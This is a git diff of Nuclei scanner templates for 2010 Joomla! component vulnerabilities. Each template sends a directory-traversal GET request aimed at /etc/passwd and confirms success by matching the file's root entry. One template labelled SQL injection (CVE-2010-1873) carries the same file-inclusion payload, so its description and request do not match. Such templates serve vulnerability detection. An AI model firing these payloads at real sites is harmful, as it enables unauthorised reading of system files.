- description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12102
- - https://www.cvedetails.com/cve/CVE-2010-1354
- - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt
- - http://secunia.com/advisories/39296
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-1354
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1461.yaml b/nuclei-templates/CVE-2010/CVE-2010-1461.yaml
new file mode 100644
index 0000000000..0409f0399b
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1461.yaml
@@ -0,0 +1,29 @@
+id: CVE-2010-1461
+
+info:
+ name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12232
+ - https://www.cvedetails.com/cve/CVE-2010-1461
+ - http://www.securityfocus.com/bid/39504
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1461
+ tags: cve,cve2010,joomla,lfi,photo
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1470.yaml b/nuclei-templates/CVE-2010/CVE-2010-1470.yaml
new file mode 100644
index 0000000000..bf37563f9b
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1470.yaml
@@ -0,0 +1,29 @@
+id: CVE-2010-1470
+
+info:
+ name: Joomla! Component Web TV 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12166
+ - https://www.cvedetails.com/cve/CVE-2010-1470
+ - http://secunia.com/advisories/39405
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1470
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1471.yaml b/nuclei-templates/CVE-2010/CVE-2010-1471.yaml
deleted file mode 100644
index 7234a24465..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1471.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: CVE-2010-1471
-
-info:
- name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12170
- - https://www.cvedetails.com/cve/CVE-2010-1471
- - http://www.vupen.com/english/advisories/2010/0862
- classification:
- cve-id: CVE-2010-1471
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1476.yaml b/nuclei-templates/CVE-2010/CVE-2010-1476.yaml
new file mode 100644
index 0000000000..156adbb01b
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1476.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1476
+
+info:
+ name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12150
+ - https://www.cvedetails.com/cve/CVE-2010-1476
+ - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt
+ - http://www.alphaplug.com/
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1476
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1478.yaml b/nuclei-templates/CVE-2010/CVE-2010-1478.yaml
deleted file mode 100644
index e364de8273..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1478.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: CVE-2010-1478
-
-info:
- name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12145
- - https://www.cvedetails.com/cve/CVE-2010-1478
- - http://secunia.com/advisories/39262
- - http://www.securityfocus.com/bid/39390
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-1478
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1491.yaml b/nuclei-templates/CVE-2010/CVE-2010-1491.yaml
deleted file mode 100644
index bbda15aa41..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1491.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-1491
-
-info:
- name: Joomla! Component MMS Blog 2.3.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12318
- - https://www.cvedetails.com/cve/CVE-2010-1491
- - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt
- - http://secunia.com/advisories/39533
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-1491
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1494.yaml b/nuclei-templates/CVE-2010/CVE-2010-1494.yaml
deleted file mode 100644
index db3b3fdb9f..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1494.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-1494
-
-info:
- name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12113
- - https://www.cvedetails.com/cve/CVE-2010-1494
- - http://www.osvdb.org/63943
- - http://www.exploit-db.com/exploits/12113
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-1494
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/02/14
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1532.yaml b/nuclei-templates/CVE-2010/CVE-2010-1532.yaml
deleted file mode 100644
index 5f2d0e4a18..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1532.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-1532
-
-info:
- name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12118
- - https://www.cvedetails.com/cve/CVE-2010-1532
- - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt
- - http://www.securityfocus.com/bid/39348
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-1532
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/02/15
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1535.yaml b/nuclei-templates/CVE-2010/CVE-2010-1535.yaml
deleted file mode 100644
index 9b6bbe7ec5..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1535.yaml
+++ /dev/null
@@ -1,29 +0,0 @@
-id: CVE-2010-1535
-
-info:
- name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12151
- - https://www.cvedetails.com/cve/CVE-2010-1535
- - http://secunia.com/advisories/39254
- classification:
- cve-id: CVE-2010-1535
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/24
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1653.yaml b/nuclei-templates/CVE-2010/CVE-2010-1653.yaml
deleted file mode 100644
index 737487cfd0..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1653.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-1653
-
-info:
- name: Joomla! Component Graphics 1.0.6 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12430
- - https://www.cvedetails.com/cve/CVE-2010-1653
- - http://packetstormsecurity.org/1004-exploits/joomlagraphics-lfi.txt
- - http://www.securityfocus.com/bid/39743
- classification:
- cve-id: CVE-2010-1653
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/23
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1657.yaml b/nuclei-templates/CVE-2010/CVE-2010-1657.yaml
deleted file mode 100644
index 4c62d5a31c..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1657.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-1657
-
-info:
- name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2010-1657
- - https://www.exploit-db.com/exploits/12428
- - http://www.vupen.com/english/advisories/2010/1006
- - http://www.securityfocus.com/bid/39740
- classification:
- cve-id: CVE-2010-1657
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/27
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1658.yaml b/nuclei-templates/CVE-2010/CVE-2010-1658.yaml
deleted file mode 100644
index aae12dd013..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1658.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-1658
-
-info:
- name: Joomla! Component NoticeBoard 1.3 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the Code-Garage NoticeBoard (com_noticeboard) component 1.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12427
- - https://www.cvedetails.com/cve/CVE-2010-1658
- - http://www.vupen.com/english/advisories/2010/1007
- - http://secunia.com/advisories/39600
- classification:
- cve-id: CVE-2010-1658
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/27
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1659.yaml b/nuclei-templates/CVE-2010/CVE-2010-1659.yaml
new file mode 100644
index 0000000000..90e20630f5
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1659.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1659
+
+info:
+ name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12426
+ - https://nvd.nist.gov/vuln/detail/CVE-2010-1659
+ - http://www.securityfocus.com/bid/39739
+ - http://www.exploit-db.com/exploits/12426
+ classification:
+ cve-id: CVE-2010-1659
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/28
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1714.yaml b/nuclei-templates/CVE-2010/CVE-2010-1714.yaml
deleted file mode 100644
index 6470d09b21..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1714.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: CVE-2010-1714
-info:
- name: Joomla! Component Arcade Games 1.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12168
- - https://www.cvedetails.com/cve/CVE-2010-1714
- tags: cve,cve2010,joomla,lfi
- classification:
- cve-id: CVE-2010-1714
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/28
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1715.yaml b/nuclei-templates/CVE-2010/CVE-2010-1715.yaml
new file mode 100644
index 0000000000..a97738faf3
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1715.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1715
+
+info:
+ name: Joomla! Component Online Exam 1.5.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Online Examination (aka Online Exam or com_onlineexam) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12174
+ - https://www.cvedetails.com/cve/CVE-2010-1715
+ - http://www.osvdb.org/63659
+ - http://packetstormsecurity.org/1004-exploits/joomlaonlineexam-lfi.txt
+ classification:
+ cve-id: CVE-2010-1715
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/10
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1717.yaml b/nuclei-templates/CVE-2010/CVE-2010-1717.yaml
deleted file mode 100644
index 890db1d0fa..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1717.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-1717
-
-info:
- name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12291
- - https://www.cvedetails.com/cve/CVE-2010-1717
- - http://secunia.com/advisories/39526
- - http://www.vupen.com/english/advisories/2010/0924
- classification:
- cve-id: CVE-2010-1717
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/03/01
diff --git a/nuclei-templates/CVE-2010/cve-2010-1870.yaml b/nuclei-templates/CVE-2010/CVE-2010-1870.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/cve-2010-1870.yaml
rename to nuclei-templates/CVE-2010/CVE-2010-1870.yaml
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1873.yaml b/nuclei-templates/CVE-2010/CVE-2010-1873.yaml
new file mode 100644
index 0000000000..a93b1f35ff
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1873.yaml
@@ -0,0 +1,28 @@
+id: CVE-2010-1873
+
+info:
+ name: Joomla! Component Jvehicles SQL Injection
+ author: daffainfo
+ severity: high
+ description: A SQL injection vulnerability in the Jvehicles (com_jvehicles) component 1.0, 2.0, and 2.1111 for Joomla! allows remote attackers to execute arbitrary SQL commands via the aid parameter in an agentlisting action to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11997
+ - https://www.cvedetails.com/cve/CVE-2010-1873
+ tags: cve,cve2010,joomla,lfi,sql-injection
+ classification:
+ cve-id: CVE-2010-1873
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/20
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1952.yaml b/nuclei-templates/CVE-2010/CVE-2010-1952.yaml
new file mode 100644
index 0000000000..33bb5efa53
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1952.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-1952
+
+info:
+ name: Joomla! Component BeeHeard 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the BeeHeard (com_beeheard) and BeeHeard Lite (com_beeheardlite) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12239
+ - https://www.cvedetails.com/cve/CVE-2010-1952
+ - http://secunia.com/advisories/39475
+ - http://www.exploit-db.com/exploits/12239
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1952
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/15
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1954.yaml b/nuclei-templates/CVE-2010/CVE-2010-1954.yaml
deleted file mode 100644
index 67e4710e8c..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1954.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-1954
-
-info:
- name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12287
- - https://www.cvedetails.com/cve/CVE-2010-1954
- - http://www.securityfocus.com/bid/39552
- - http://www.exploit-db.com/exploits/12287
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-1954
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0:"
- - type: status
- status:
- - 200
-# Enhanced by mp on 2022/02/15
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1956.yaml b/nuclei-templates/CVE-2010/CVE-2010-1956.yaml
new file mode 100644
index 0000000000..15d2026732
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1956.yaml
@@ -0,0 +1,29 @@
+id: CVE-2010-1956
+
+info:
+ name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12285
+ - https://www.cvedetails.com/cve/CVE-2010-1956
+ - http://secunia.com/advisories/39522
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1956
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+ - type: status
+ status:
+ - 200
+# Enhanced by mp on 2022/02/15
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1957.yaml b/nuclei-templates/CVE-2010/CVE-2010-1957.yaml
new file mode 100644
index 0000000000..fee775cfe3
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1957.yaml
@@ -0,0 +1,33 @@
+id: CVE-2010-1957
+
+info:
+ name: Joomla! Component Love Factory 1.3.4 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Love Factory (com_lovefactory) component 1.3.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12235
+ - https://www.cvedetails.com/cve/CVE-2010-1957
+ - http://packetstormsecurity.org/1004-exploits/joomlalovefactory-lfi.txt
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1957
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/16
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1977.yaml b/nuclei-templates/CVE-2010/CVE-2010-1977.yaml
deleted file mode 100644
index a28a59056f..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1977.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: CVE-2010-1977
-
-info:
- name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12083
- - https://www.cvedetails.com/cve/CVE-2010-1977
- - http://www.securityfocus.com/bid/39243
- - http://secunia.com/advisories/39356
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-1977
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/16
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1980.yaml b/nuclei-templates/CVE-2010/CVE-2010-1980.yaml
deleted file mode 100644
index c251891840..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-1980.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: CVE-2010-1980
-
-info:
- name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12085
- - https://www.cvedetails.com/cve/CVE-2010-1980
- - http://packetstormsecurity.org/1004-exploits/joomlaflickr-lfi.txt
- - http://www.exploit-db.com/exploits/12085
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-1980
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-1982.yaml b/nuclei-templates/CVE-2010/CVE-2010-1982.yaml
new file mode 100644
index 0000000000..15283354c4
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1982.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-1982
+
+info:
+ name: Joomla! Component JA Voice 2.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12121
+ - https://www.cvedetails.com/cve/CVE-2010-1982
+ - http://secunia.com/advisories/39202
+ - http://www.securityfocus.com/bid/39343
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1982
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
